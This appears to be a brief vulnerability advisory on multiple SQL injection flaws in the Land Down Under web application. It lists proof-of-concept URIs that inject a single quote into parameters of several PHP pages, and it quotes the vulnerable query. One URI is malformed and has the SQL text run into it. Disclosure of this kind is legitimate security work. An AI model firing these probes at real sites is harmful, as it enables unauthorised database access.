|
Land Down Under Multiple SQL Injection Vulnerabilities
No exploit is required. The following proof-of-concept URIs are available: http://www.example.com/ldu/forums.php?m=topics&s=' http://www.example.com/ldu/list.php?c=articles&s=title&w=asc&o='&p=1 http://www.example.com/ldu/list.php?c=articles&s=title&w='&o=1&p=1 http://www.example.com/ldu/list.php?c=articles&s='&w=asc&o=1&p=1 http://www.example.com/ldu/journal.php?m='&s=username&w=asc http://www.example.com/ldu/journal.php?m='&p=1 http://www.example.com/ldu/journal.php?m=' http://www.example.com/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x=' http://www.example.com/ldu/forums.php?m=topics&q=3&n=' http://www.example.com/ldu/list.php?c=articles&s=title&w=asc&o=1&p=' http://www.example.com/ldu/forums.php?m='&q=3&n=last http://www.example.com/ldu/links.php?c=links&s=title&w=' http://www.example.comldu//journal.php?m='&s=username&w=SELECT * FROM $db_journals WHERE jrn_userid='$jrn_userid' AND jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w |
|
|
Privacy Statement |